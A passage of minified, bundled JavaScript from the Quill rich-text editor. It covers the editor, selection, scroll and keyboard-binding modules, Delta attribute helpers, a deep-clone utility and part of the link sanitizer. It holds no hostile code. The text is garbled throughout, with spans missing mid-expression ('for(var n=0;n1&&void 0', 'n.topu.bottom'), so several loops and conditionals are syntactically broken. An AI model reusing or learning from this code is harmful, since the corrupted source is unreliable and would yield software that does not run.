o.default)}},{key:"getFormat",value:function(e){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:0,n=[],i=[];0===a?this.scroll.path(e).forEach((function(e){var a=t(e,1)[0];a instanceof h.default?n.push(a):a instanceof l.default.Leaf&&i.push(a)})):(n=this.scroll.lines(e,a),i=this.scroll.descendants(l.default.Leaf,e,a));var r=[n,i].map((function(e){if(0===e.length)return{};for(var a=(0,d.bubbleFormats)(e.shift());Object.keys(a).length>0;){var n=e.shift();if(null==n)return a;a=y((0,d.bubbleFormats)(n),a)}return a}));return v.default.apply(v.default,r)}},{key:"getText",value:function(e,a){return this.getContents(e,a).filter((function(e){return"string"===typeof e.insert})).map((function(e){return e.insert})).join("")}},{key:"insertEmbed",value:function(e,a,n){return this.scroll.insertAt(e,a,n),this.update((new o.default).retain(e).insert(function(e,a,n){return a in e?Object.defineProperty(e,a,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[a]=n,e}({},a,n)))}},{key:"insertText",value:function(e,a){var n=this,i=arguments.length>2&&void 0!==arguments[2]?arguments[2]:{};return a=a.replace(/\r\n/g,"\n").replace(/\r/g,"\n"),this.scroll.insertAt(e,a),Object.keys(i).forEach((function(t){n.scroll.formatAt(e,a.length,t,i[t])})),this.update((new o.default).retain(e).insert(a,(0,m.default)(i)))}},{key:"isBlank",value:function(){if(0==this.scroll.children.length)return!0;if(this.scroll.children.length>1)return!1;var e=this.scroll.children.head;return e.statics.blotName===h.default.blotName&&!(e.children.length>1)&&e.children.head instanceof p.default}},{key:"removeFormat",value:function(e,a){var n=this.getText(e,a),i=this.scroll.line(e+a),r=t(i,2),s=r[0],l=r[1],c=0,d=new o.default;null!=s&&(c=s instanceof u.default?s.newlineIndex(l)-l+1:s.length()-l,d=s.delta().slice(l,l+c-1).insert("\n"));var h=this.getContents(e,a+c).diff((new o.default).insert(n).concat(d)),p=(new o.default).retain(e).concat(h);return this.applyDelta(p)}},{key:"update",value:function(e){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:[],n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:void 0,i=this.delta;if(1===a.length&&"characterData"===a[0].type&&a[0].target.data.match(b)&&l.default.find(a[0].target)){var t=l.default.find(a[0].target),r=(0,d.bubbleFormats)(t),s=t.offset(this.scroll),u=a[0].oldValue.replace(c.default.CONTENTS,""),h=(new o.default).insert(u),p=(new o.default).insert(t.value()),m=(new o.default).retain(s).concat(h.diff(p,n));e=m.reduce((function(e,a){return a.insert?e.insert(a.insert,r):e.push(a)}),new o.default),this.delta=i.compose(e)}else this.delta=this.getDelta(),e&&(0,f.default)(i.compose(e),this.delta)||(e=i.diff(this.delta,n));return e}}]),e}();function y(e,a){return Object.keys(a).reduce((function(n,i){return null==e[i]||(a[i]===e[i]?n[i]=a[i]:Array.isArray(a[i])?a[i].indexOf(e[i])<0&&(n[i]=a[i].concat([e[i]])):n[i]=[a[i],e[i]]),n}),{})}a.default=k},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0}),a.default=a.Range=void 0;var i=function(e,a){if(Array.isArray(e))return e;if(Symbol.iterator in Object(e))return function(e,a){var n=[],i=!0,t=!1,r=void 0;try{for(var o,s=e[Symbol.iterator]();!(i=(o=s.next()).done)&&(n.push(o.value),!a||n.length!==a);i=!0);}catch(l){t=!0,r=l}finally{try{!i&&s.return&&s.return()}finally{if(t)throw r}}return n}(e,a);throw new TypeError("Invalid attempt to destructure non-iterable instance")},t=function(){function e(e,a){for(var n=0;n1&&void 0!==arguments[1]?arguments[1]:0;d(this,e),this.index=a,this.length=n},m=function(){function e(a,n){var i=this;d(this,e),this.emitter=n,this.scroll=a,this.composing=!1,this.mouseDown=!1,this.root=this.scroll.domNode,this.cursor=r.default.create("cursor",this),this.lastRange=this.savedRange=new p(0,0),this.handleComposition(),this.handleDragging(),this.emitter.listenDOM("selectionchange",document,(function(){i.mouseDown||setTimeout(i.update.bind(i,l.default.sources.USER),1)})),this.emitter.on(l.default.events.EDITOR_CHANGE,(function(e,a){e===l.default.events.TEXT_CHANGE&&a.length()>0&&i.update(l.default.sources.SILENT)})),this.emitter.on(l.default.events.SCROLL_BEFORE_UPDATE,(function(){if(i.hasFocus()){var e=i.getNativeRange();null!=e&&e.start.node!==i.cursor.textNode&&i.emitter.once(l.default.events.SCROLL_UPDATE,(function(){try{i.setNativeRange(e.start.node,e.start.offset,e.end.node,e.end.offset)}catch(a){}}))}})),this.emitter.on(l.default.events.SCROLL_OPTIMIZE,(function(e,a){if(a.range){var n=a.range,t=n.startNode,r=n.startOffset,o=n.endNode,s=n.endOffset;i.setNativeRange(t,r,o,s)}})),this.update(l.default.sources.SILENT)}return t(e,[{key:"handleComposition",value:function(){var e=this;this.root.addEventListener("compositionstart",(function(){e.composing=!0})),this.root.addEventListener("compositionend",(function(){if(e.composing=!1,e.cursor.parent){var a=e.cursor.restore();if(!a)return;setTimeout((function(){e.setNativeRange(a.startNode,a.startOffset,a.endNode,a.endOffset)}),1)}}))}},{key:"handleDragging",value:function(){var e=this;this.emitter.listenDOM("mousedown",document.body,(function(){e.mouseDown=!0})),this.emitter.listenDOM("mouseup",document.body,(function(){e.mouseDown=!1,e.update(l.default.sources.USER)}))}},{key:"focus",value:function(){this.hasFocus()||(this.root.focus(),this.setRange(this.savedRange))}},{key:"format",value:function(e,a){if(null==this.scroll.whitelist||this.scroll.whitelist[e]){this.scroll.update();var n=this.getNativeRange();if(null!=n&&n.native.collapsed&&!r.default.query(e,r.default.Scope.BLOCK)){if(n.start.node!==this.cursor.textNode){var i=r.default.find(n.start.node,!1);if(null==i)return;if(i instanceof r.default.Leaf){var t=i.split(n.start.offset);i.parent.insertBefore(this.cursor,t)}else i.insertBefore(this.cursor,n.start.node);this.cursor.attach()}this.cursor.format(e,a),this.scroll.optimize(),this.setNativeRange(this.cursor.textNode,this.cursor.textNode.data.length),this.update()}}}},{key:"getBounds",value:function(e){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:0,n=this.scroll.length();e=Math.min(e,n-1),a=Math.min(e+a,n-1)-e;var t=void 0,r=this.scroll.leaf(e),o=i(r,2),s=o[0],l=o[1];if(null==s)return null;var u=s.position(l,!0),c=i(u,2);t=c[0],l=c[1];var d=document.createRange();if(a>0){d.setStart(t,l);var h=this.scroll.leaf(e+a),p=i(h,2);if(s=p[0],l=p[1],null==s)return null;var m=s.position(l,!0),f=i(m,2);return t=f[0],l=f[1],d.setEnd(t,l),d.getBoundingClientRect()}var v="left",g=void 0;return t instanceof Text?(l0&&(v="right")),{bottom:g.top+g.height,height:g.height,left:g[v],right:g[v],top:g.top,width:0}}},{key:"getNativeRange",value:function(){var e=document.getSelection();if(null==e||e.rangeCount<=0)return null;var a=e.getRangeAt(0);if(null==a)return null;var n=this.normalizeNative(a);return h.info("getNativeRange",n),n}},{key:"getRange",value:function(){var e=this.getNativeRange();return null==e?[null,null]:[this.normalizedToRange(e),e]}},{key:"hasFocus",value:function(){return document.activeElement===this.root}},{key:"normalizedToRange",value:function(e){var a=this,n=[[e.start.node,e.start.offset]];e.native.collapsed||n.push([e.end.node,e.end.offset]);var t=n.map((function(e){var n=i(e,2),t=n[0],o=n[1],s=r.default.find(t,!0),l=s.offset(a.scroll);return 0===o?l:s instanceof r.default.Container?l+s.length():l+s.index(t,o)})),o=Math.min(Math.max.apply(Math,c(t)),this.scroll.length()-1),s=Math.min.apply(Math,[o].concat(c(t)));return new p(s,o-s)}},{key:"normalizeNative",value:function(e){if(!f(this.root,e.startContainer)||!e.collapsed&&!f(this.root,e.endContainer))return null;var a={start:{node:e.startContainer,offset:e.startOffset},end:{node:e.endContainer,offset:e.endOffset},native:e};return[a.start,a.end].forEach((function(e){for(var a=e.node,n=e.offset;!(a instanceof Text)&&a.childNodes.length>0;)if(a.childNodes.length>n)a=a.childNodes[n],n=0;else{if(a.childNodes.length!==n)break;n=(a=a.lastChild)instanceof Text?a.data.length:a.childNodes.length+1}e.node=a,e.offset=n})),a}},{key:"rangeToNative",value:function(e){var a=this,n=e.collapsed?[e.index]:[e.index,e.index+e.length],t=[],r=this.scroll.length();return n.forEach((function(e,n){e=Math.min(r-1,e);var o,s=a.scroll.leaf(e),l=i(s,2),u=l[0],c=l[1],d=u.position(c,0!==n),h=i(d,2);o=h[0],c=h[1],t.push(o,c)})),t.length<2&&(t=t.concat(t)),t}},{key:"scrollIntoView",value:function(e){var a=this.lastRange;if(null!=a){var n=this.getBounds(a.index,a.length);if(null!=n){var t=this.scroll.length()-1,r=this.scroll.line(Math.min(a.index,t)),o=i(r,1)[0],s=o;if(a.length>0){var l=this.scroll.line(Math.min(a.index+a.length,t));s=i(l,1)[0]}if(null!=o&&null!=s){var u=e.getBoundingClientRect();n.topu.bottom&&(e.scrollTop+=n.bottom-u.bottom)}}}}},{key:"setNativeRange",value:function(e,a){var n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:e,i=arguments.length>3&&void 0!==arguments[3]?arguments[3]:a,t=arguments.length>4&&void 0!==arguments[4]&&arguments[4];if(h.info("setNativeRange",e,a,n,i),null==e||null!=this.root.parentNode&&null!=e.parentNode&&null!=n.parentNode){var r=document.getSelection();if(null!=r)if(null!=e){this.hasFocus()||this.root.focus();var o=(this.getNativeRange()||{}).native;if(null==o||t||e!==o.startContainer||a!==o.startOffset||n!==o.endContainer||i!==o.endOffset){"BR"==e.tagName&&(a=[].indexOf.call(e.parentNode.childNodes,e),e=e.parentNode),"BR"==n.tagName&&(i=[].indexOf.call(n.parentNode.childNodes,n),n=n.parentNode);var s=document.createRange();s.setStart(e,a),s.setEnd(n,i),r.removeAllRanges(),r.addRange(s)}}else r.removeAllRanges(),this.root.blur(),document.body.focus()}}},{key:"setRange",value:function(e){var a=arguments.length>1&&void 0!==arguments[1]&&arguments[1],n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:l.default.sources.API;if("string"===typeof a&&(n=a,a=!1),h.info("setRange",e),null!=e){var i=this.rangeToNative(e);this.setNativeRange.apply(this,c(i).concat([a]))}else this.setNativeRange(null);this.update(n)}},{key:"update",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:l.default.sources.USER,a=this.lastRange,n=this.getRange(),t=i(n,2),r=t[0],u=t[1];if(this.lastRange=r,null!=this.lastRange&&(this.savedRange=this.lastRange),!(0,s.default)(a,this.lastRange)){var c;!this.composing&&null!=u&&u.native.collapsed&&u.start.node!==this.cursor.textNode&&this.cursor.restore();var d,h=[l.default.events.SELECTION_CHANGE,(0,o.default)(this.lastRange),(0,o.default)(a),e];(c=this.emitter).emit.apply(c,[l.default.events.EDITOR_CHANGE].concat(h)),e!==l.default.sources.SILENT&&(d=this.emitter).emit.apply(d,h)}}}]),e}();function f(e,a){try{a.parentNode}catch(n){return!1}return a instanceof Text&&(a=a.parentNode),e.contains(a)}a.Range=p,a.default=m},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i,t=function(){function e(e,a){for(var n=0;n0&&(n+=1),[this.parent.domNode,n]},a.prototype.value=function(){var e;return(e={})[this.statics.blotName]=this.statics.value(this.domNode)||!0,e},a.scope=r.Scope.INLINE_BLOT,a}(t.default);a.default=o},function(e,a,n){var i=n(11),t=n(3),r={attributes:{compose:function(e,a,n){"object"!==typeof e&&(e={}),"object"!==typeof a&&(a={});var i=t(!0,{},a);for(var r in n||(i=Object.keys(i).reduce((function(e,a){return null!=i[a]&&(e[a]=i[a]),e}),{})),e)void 0!==e[r]&&void 0===a[r]&&(i[r]=e[r]);return Object.keys(i).length>0?i:void 0},diff:function(e,a){"object"!==typeof e&&(e={}),"object"!==typeof a&&(a={});var n=Object.keys(e).concat(Object.keys(a)).reduce((function(n,t){return i(e[t],a[t])||(n[t]=void 0===a[t]?null:a[t]),n}),{});return Object.keys(n).length>0?n:void 0},transform:function(e,a,n){if("object"!==typeof e)return a;if("object"===typeof a){if(!n)return a;var i=Object.keys(a).reduce((function(n,i){return void 0===e[i]&&(n[i]=a[i]),n}),{});return Object.keys(i).length>0?i:void 0}}},iterator:function(e){return new o(e)},length:function(e){return"number"===typeof e.delete?e.delete:"number"===typeof e.retain?e.retain:"string"===typeof e.insert?e.insert.length:1}};function o(e){this.ops=e,this.index=0,this.offset=0}o.prototype.hasNext=function(){return this.peekLength()<1/0},o.prototype.next=function(e){e||(e=1/0);var a=this.ops[this.index];if(a){var n=this.offset,i=r.length(a);if(e>=i-n?(e=i-n,this.index+=1,this.offset=0):this.offset+=e,"number"===typeof a.delete)return{delete:e};var t={};return a.attributes&&(t.attributes=a.attributes),"number"===typeof a.retain?t.retain=e:"string"===typeof a.insert?t.insert=a.insert.substr(n,e):t.insert=a.insert,t}return{retain:1/0}},o.prototype.peek=function(){return this.ops[this.index]},o.prototype.peekLength=function(){return this.ops[this.index]?r.length(this.ops[this.index])-this.offset:1/0},o.prototype.peekType=function(){return this.ops[this.index]?"number"===typeof this.ops[this.index].delete?"delete":"number"===typeof this.ops[this.index].retain?"retain":"insert":"retain"},o.prototype.rest=function(){if(this.hasNext()){if(0===this.offset)return this.ops.slice(this.index);var e=this.offset,a=this.index,n=this.next(),i=this.ops.slice(this.index);return this.offset=e,this.index=a,[n].concat(i)}return[]},e.exports=r},function(e,a){var n=function(){"use strict";function e(e,a){return null!=a&&e instanceof a}var a,n,i;try{a=Map}catch(s){a=function(){}}try{n=Set}catch(s){n=function(){}}try{i=Promise}catch(s){i=function(){}}function t(r,s,l,u,c){"object"===typeof s&&(l=s.depth,u=s.prototype,c=s.includeNonEnumerable,s=s.circular);var d=[],h=[],p="undefined"!=typeof Buffer;return"undefined"==typeof s&&(s=!0),"undefined"==typeof l&&(l=1/0),function r(l,m){if(null===l)return null;if(0===m)return l;var f,v;if("object"!=typeof l)return l;if(e(l,a))f=new a;else if(e(l,n))f=new n;else if(e(l,i))f=new i((function(e,a){l.then((function(a){e(r(a,m-1))}),(function(e){a(r(e,m-1))}))}));else if(t.__isArray(l))f=[];else if(t.__isRegExp(l))f=new RegExp(l.source,o(l)),l.lastIndex&&(f.lastIndex=l.lastIndex);else if(t.__isDate(l))f=new Date(l.getTime());else{if(p&&Buffer.isBuffer(l))return f=Buffer.allocUnsafe?Buffer.allocUnsafe(l.length):new Buffer(l.length),l.copy(f),f;e(l,Error)?f=Object.create(l):"undefined"==typeof u?(v=Object.getPrototypeOf(l),f=Object.create(v)):(f=Object.create(u),v=u)}if(s){var g=d.indexOf(l);if(-1!=g)return h[g];d.push(l),h.push(f)}for(var b in e(l,a)&&l.forEach((function(e,a){var n=r(a,m-1),i=r(e,m-1);f.set(n,i)})),e(l,n)&&l.forEach((function(e){var a=r(e,m-1);f.add(a)})),l){var k;v&&(k=Object.getOwnPropertyDescriptor(v,b)),k&&null==k.set||(f[b]=r(l[b],m-1))}if(Object.getOwnPropertySymbols){var y=Object.getOwnPropertySymbols(l);for(b=0;b0){if(s instanceof l.BlockEmbed||p instanceof l.BlockEmbed)return void this.optimize();if(s instanceof d.default){var m=s.newlineIndex(s.length(),!0);if(m>-1&&(s=s.split(m+1))===p)return void this.optimize()}else if(p instanceof d.default){var f=p.newlineIndex(0);f>-1&&p.split(f+1)}var v=p.children.head instanceof c.default?null:p.children.head;s.moveChildren(p,v),s.remove()}this.optimize()}},{key:"enable",value:function(){var e=!(arguments.length>0&&void 0!==arguments[0])||arguments[0];this.domNode.setAttribute("contenteditable",e)}},{key:"formatAt",value:function(e,n,i,t){(null==this.whitelist||this.whitelist[i])&&(r(a.prototype.__proto__||Object.getPrototypeOf(a.prototype),"formatAt",this).call(this,e,n,i,t),this.optimize())}},{key:"insertAt",value:function(e,n,i){if(null==i||null==this.whitelist||this.whitelist[n]){if(e>=this.length())if(null==i||null==o.default.query(n,o.default.Scope.BLOCK)){var t=o.default.create(this.statics.defaultChild);this.appendChild(t),null==i&&n.endsWith("\n")&&(n=n.slice(0,-1)),t.insertAt(0,n,i)}else{var s=o.default.create(n,i);this.appendChild(s)}else r(a.prototype.__proto__||Object.getPrototypeOf(a.prototype),"insertAt",this).call(this,e,n,i);this.optimize()}}},{key:"insertBefore",value:function(e,n){if(e.statics.scope===o.default.Scope.INLINE_BLOT){var i=o.default.create(this.statics.defaultChild);i.appendChild(e),e=i}r(a.prototype.__proto__||Object.getPrototypeOf(a.prototype),"insertBefore",this).call(this,e,n)}},{key:"leaf",value:function(e){return this.path(e).pop()||[null,-1]}},{key:"line",value:function(e){return e===this.length()?this.line(e-1):this.descendant(m,e)}},{key:"lines",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:0,a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:Number.MAX_VALUE,n=function e(a,n,i){var t=[],r=i;return a.children.forEachAt(n,i,(function(a,n,i){m(a)?t.push(a):a instanceof o.default.Container&&(t=t.concat(e(a,n,r))),r-=i})),t};return n(this,e,a)}},{key:"optimize",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:[],n=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{};!0!==this.batch&&(r(a.prototype.__proto__||Object.getPrototypeOf(a.prototype),"optimize",this).call(this,e,n),e.length>0&&this.emitter.emit(s.default.events.SCROLL_OPTIMIZE,e,n))}},{key:"path",value:function(e){return r(a.prototype.__proto__||Object.getPrototypeOf(a.prototype),"path",this).call(this,e).slice(1)}},{key:"update",value:function(e){if(!0!==this.batch){var n=s.default.sources.USER;"string"===typeof e&&(n=e),Array.isArray(e)||(e=this.observer.takeRecords()),e.length>0&&this.emitter.emit(s.default.events.SCROLL_BEFORE_UPDATE,n,e),r(a.prototype.__proto__||Object.getPrototypeOf(a.prototype),"update",this).call(this,e.concat([])),e.length>0&&this.emitter.emit(s.default.events.SCROLL_UPDATE,n,e)}}}]),a}(o.default.Scroll);f.blotName="scroll",f.className="ql-editor",f.tagName="DIV",f.defaultChild="block",f.allowedChildren=[u.default,l.BlockEmbed,h.default],a.default=f},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0}),a.SHORTKEY=a.default=void 0;var i="function"===typeof Symbol&&"symbol"===typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"===typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},t=function(e,a){if(Array.isArray(e))return e;if(Symbol.iterator in Object(e))return function(e,a){var n=[],i=!0,t=!1,r=void 0;try{for(var o,s=e[Symbol.iterator]();!(i=(o=s.next()).done)&&(n.push(o.value),!a||n.length!==a);i=!0);}catch(l){t=!0,r=l}finally{try{!i&&s.return&&s.return()}finally{if(t)throw r}}return n}(e,a);throw new TypeError("Invalid attempt to destructure non-iterable instance")},r=function(){function e(e,a){for(var n=0;n1&&void 0!==arguments[1]?arguments[1]:{},n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:{},i=C(e);if(null==i||null==i.key)return g.warn("Attempted to add invalid keyboard binding",i);"function"===typeof a&&(a={handler:a}),"function"===typeof n&&(n={handler:n}),i=(0,l.default)(i,a,n),this.bindings[i.key]=this.bindings[i.key]||[],this.bindings[i.key].push(i)}},{key:"listen",value:function(){var e=this;this.quill.root.addEventListener("keydown",(function(n){if(!n.defaultPrevented){var r=n.which||n.keyCode,o=(e.bindings[r]||[]).filter((function(e){return a.match(n,e)}));if(0!==o.length){var l=e.quill.getSelection();if(null!=l&&e.quill.hasFocus()){var u=e.quill.getLine(l.index),c=t(u,2),h=c[0],p=c[1],m=e.quill.getLeaf(l.index),f=t(m,2),v=f[0],g=f[1],b=0===l.length?[v,g]:e.quill.getLeaf(l.index+l.length),k=t(b,2),y=k[0],x=k[1],S=v instanceof d.default.Text?v.value().slice(0,g):"",A=y instanceof d.default.Text?y.value().slice(x):"",w={collapsed:0===l.length,empty:0===l.length&&h.length()<=1,format:e.quill.getFormat(l),offset:p,prefix:S,suffix:A};o.some((function(a){if(null!=a.collapsed&&a.collapsed!==w.collapsed)return!1;if(null!=a.empty&&a.empty!==w.empty)return!1;if(null!=a.offset&&a.offset!==w.offset)return!1;if(Array.isArray(a.format)){if(a.format.every((function(e){return null==w.format[e]})))return!1}else if("object"===i(a.format)&&!Object.keys(a.format).every((function(e){return!0===a.format[e]?null!=w.format[e]:!1===a.format[e]?null==w.format[e]:(0,s.default)(a.format[e],w.format[e])})))return!1;return!(null!=a.prefix&&!a.prefix.test(w.prefix))&&!(null!=a.suffix&&!a.suffix.test(w.suffix))&&!0!==a.handler.call(e,l,w)}))&&n.preventDefault()}}}}))}}]),a}(m.default);function y(e,a){var n,i=e===k.keys.LEFT?"prefix":"suffix";return v(n={key:e,shiftKey:a,altKey:null},i,/^$/),v(n,"handler",(function(n){var i=n.index;e===k.keys.RIGHT&&(i+=n.length+1);var r=this.quill.getLeaf(i);return!(t(r,1)[0]instanceof d.default.Embed)||(e===k.keys.LEFT?a?this.quill.setSelection(n.index-1,n.length+1,h.default.sources.USER):this.quill.setSelection(n.index-1,h.default.sources.USER):a?this.quill.setSelection(n.index,n.length+1,h.default.sources.USER):this.quill.setSelection(n.index+n.length+1,h.default.sources.USER),!1)})),n}function x(e,a){if(!(0===e.index||this.quill.getLength()<=1)){var n=this.quill.getLine(e.index),i=t(n,1)[0],r={};if(0===a.offset){var o=this.quill.getLine(e.index-1),s=t(o,1)[0];if(null!=s&&s.length()>1){var l=i.formats(),u=this.quill.getFormat(e.index-1,1);r=c.default.attributes.diff(l,u)||{}}}var d=/[\uD800-\uDBFF][\uDC00-\uDFFF]$/.test(a.prefix)?2:1;this.quill.deleteText(e.index-d,d,h.default.sources.USER),Object.keys(r).length>0&&this.quill.formatLine(e.index-d,d,r,h.default.sources.USER),this.quill.focus()}}function S(e,a){var n=/^[\uD800-\uDBFF][\uDC00-\uDFFF]/.test(a.suffix)?2:1;if(!(e.index>=this.quill.getLength()-n)){var i={},r=0,o=this.quill.getLine(e.index),s=t(o,1)[0];if(a.offset>=s.length()-1){var l=this.quill.getLine(e.index+1),u=t(l,1)[0];if(u){var d=s.formats(),p=this.quill.getFormat(e.index,1);i=c.default.attributes.diff(d,p)||{},r=u.length()}}this.quill.deleteText(e.index,n,h.default.sources.USER),Object.keys(i).length>0&&this.quill.formatLine(e.index+r-1,n,i,h.default.sources.USER)}}function A(e){var a=this.quill.getLines(e),n={};if(a.length>1){var i=a[0].formats(),t=a[a.length-1].formats();n=c.default.attributes.diff(t,i)||{}}this.quill.deleteText(e,h.default.sources.USER),Object.keys(n).length>0&&this.quill.formatLine(e.index,1,n,h.default.sources.USER),this.quill.setSelection(e.index,h.default.sources.SILENT),this.quill.focus()}function w(e,a){var n=this;e.length>0&&this.quill.scroll.deleteAt(e.index,e.length);var i=Object.keys(a.format).reduce((function(e,n){return d.default.query(n,d.default.Scope.BLOCK)&&!Array.isArray(a.format[n])&&(e[n]=a.format[n]),e}),{});this.quill.insertText(e.index,"\n",i,h.default.sources.USER),this.quill.setSelection(e.index+1,h.default.sources.SILENT),this.quill.focus(),Object.keys(a.format).forEach((function(e){null==i[e]&&(Array.isArray(a.format[e])||"link"!==e&&n.quill.format(e,a.format[e],h.default.sources.USER))}))}function M(e){return{key:k.keys.TAB,shiftKey:!e,format:{"code-block":!0},handler:function(a){var n=d.default.query("code-block"),i=a.index,r=a.length,o=this.quill.scroll.descendant(n,i),s=t(o,2),l=s[0],u=s[1];if(null!=l){var c=this.quill.getIndex(l),p=l.newlineIndex(u,!0)+1,m=l.newlineIndex(c+u+r),f=l.domNode.textContent.slice(p,m).split("\n");u=0,f.forEach((function(a,t){e?(l.insertAt(p+u,n.TAB),u+=n.TAB.length,0===t?i+=n.TAB.length:r+=n.TAB.length):a.startsWith(n.TAB)&&(l.deleteAt(p+u,n.TAB.length),u-=n.TAB.length,0===t?i-=n.TAB.length:r-=n.TAB.length),u+=a.length+1})),this.quill.update(h.default.sources.USER),this.quill.setSelection(i,r,h.default.sources.SILENT)}}}}function j(e){return{key:e[0].toUpperCase(),shortKey:!0,handler:function(a,n){this.quill.format(e,!n.format[e],h.default.sources.USER)}}}function C(e){if("string"===typeof e||"number"===typeof e)return C({key:e});if("object"===("undefined"===typeof e?"undefined":i(e))&&(e=(0,o.default)(e,!1)),"string"===typeof e.key)if(null!=k.keys[e.key.toUpperCase()])e.key=k.keys[e.key.toUpperCase()];else{if(1!==e.key.length)return null;e.key=e.key.toUpperCase().charCodeAt(0)}return e.shortKey&&(e[b]=e.shortKey,delete e.shortKey),e}k.keys={BACKSPACE:8,TAB:9,ENTER:13,ESCAPE:27,LEFT:37,UP:38,RIGHT:39,DOWN:40,DELETE:46},k.DEFAULTS={bindings:{bold:j("bold"),italic:j("italic"),underline:j("underline"),indent:{key:k.keys.TAB,format:["blockquote","indent","list"],handler:function(e,a){if(a.collapsed&&0!==a.offset)return!0;this.quill.format("indent","+1",h.default.sources.USER)}},outdent:{key:k.keys.TAB,shiftKey:!0,format:["blockquote","indent","list"],handler:function(e,a){if(a.collapsed&&0!==a.offset)return!0;this.quill.format("indent","-1",h.default.sources.USER)}},"outdent backspace":{key:k.keys.BACKSPACE,collapsed:!0,shiftKey:null,metaKey:null,ctrlKey:null,altKey:null,format:["indent","list"],offset:0,handler:function(e,a){null!=a.format.indent?this.quill.format("indent","-1",h.default.sources.USER):null!=a.format.list&&this.quill.format("list",!1,h.default.sources.USER)}},"indent code-block":M(!0),"outdent code-block":M(!1),"remove tab":{key:k.keys.TAB,shiftKey:!0,collapsed:!0,prefix:/\t$/,handler:function(e){this.quill.deleteText(e.index-1,1,h.default.sources.USER)}},tab:{key:k.keys.TAB,handler:function(e){this.quill.history.cutoff();var a=(new u.default).retain(e.index).delete(e.length).insert("\t");this.quill.updateContents(a,h.default.sources.USER),this.quill.history.cutoff(),this.quill.setSelection(e.index+1,h.default.sources.SILENT)}},"list empty enter":{key:k.keys.ENTER,collapsed:!0,format:["list"],empty:!0,handler:function(e,a){this.quill.format("list",!1,h.default.sources.USER),a.format.indent&&this.quill.format("indent",!1,h.default.sources.USER)}},"checklist enter":{key:k.keys.ENTER,collapsed:!0,format:{list:"checked"},handler:function(e){var a=this.quill.getLine(e.index),n=t(a,2),i=n[0],r=n[1],o=(0,l.default)({},i.formats(),{list:"checked"}),s=(new u.default).retain(e.index).insert("\n",o).retain(i.length()-r-1).retain(1,{list:"unchecked"});this.quill.updateContents(s,h.default.sources.USER),this.quill.setSelection(e.index+1,h.default.sources.SILENT),this.quill.scrollIntoView()}},"header enter":{key:k.keys.ENTER,collapsed:!0,format:["header"],suffix:/^$/,handler:function(e,a){var n=this.quill.getLine(e.index),i=t(n,2),r=i[0],o=i[1],s=(new u.default).retain(e.index).insert("\n",a.format).retain(r.length()-o-1).retain(1,{header:null});this.quill.updateContents(s,h.default.sources.USER),this.quill.setSelection(e.index+1,h.default.sources.SILENT),this.quill.scrollIntoView()}},"list autofill":{key:" ",collapsed:!0,format:{list:!1},prefix:/^\s*?(\d+\.|-|\*|\[ ?\]|\[x\])$/,handler:function(e,a){var n=a.prefix.length,i=this.quill.getLine(e.index),r=t(i,2),o=r[0],s=r[1];if(s>n)return!0;var l=void 0;switch(a.prefix.trim()){case"[]":case"[ ]":l="unchecked";break;case"[x]":l="checked";break;case"-":case"*":l="bullet";break;default:l="ordered"}this.quill.insertText(e.index," ",h.default.sources.USER),this.quill.history.cutoff();var c=(new u.default).retain(e.index-s).delete(n+1).retain(o.length()-2-s).retain(1,{list:l});this.quill.updateContents(c,h.default.sources.USER),this.quill.history.cutoff(),this.quill.setSelection(e.index-n,h.default.sources.SILENT)}},"code exit":{key:k.keys.ENTER,collapsed:!0,format:["code-block"],prefix:/\n\n$/,suffix:/^\s+$/,handler:function(e){var a=this.quill.getLine(e.index),n=t(a,2),i=n[0],r=n[1],o=(new u.default).retain(e.index+i.length()-r-2).retain(1,{"code-block":null}).delete(1);this.quill.updateContents(o,h.default.sources.USER)}},"embed left":y(k.keys.LEFT,!1),"embed left shift":y(k.keys.LEFT,!0),"embed right":y(k.keys.RIGHT,!1),"embed right shift":y(k.keys.RIGHT,!0)}},a.default=k,a.SHORTKEY=b},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i=function(e,a){if(Array.isArray(e))return e;if(Symbol.iterator in Object(e))return function(e,a){var n=[],i=!0,t=!1,r=void 0;try{for(var o,s=e[Symbol.iterator]();!(i=(o=s.next()).done)&&(n.push(o.value),!a||n.length!==a);i=!0);}catch(l){t=!0,r=l}finally{try{!i&&s.return&&s.return()}finally{if(t)throw r}}return n}(e,a);throw new TypeError("Invalid attempt to destructure non-iterable instance")},t=function e(a,n,i){null===a&&(a=Function.prototype);var t=Object.getOwnPropertyDescriptor(a,n);if(void 0===t){var r=Object.getPrototypeOf(a);return null===r?void 0:e(r,n,i)}if("value"in t)return t.value;var o=t.get;return void 0!==o?o.call(i):void 0},r=function(){function e(e,a){for(var n=0;n-1}u.blotName="link",u.tagName="A",u.SANITIZED_URL="about:blank",u.PROTOCOL_WHITELIST=["http","https","mailto","tel"],a.default=u,a.sanitize=c},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i="function"===typeof Symbol&&"symbol"===typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"===typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},t=function(){function e(e,a){for(var n=0;n1&&void 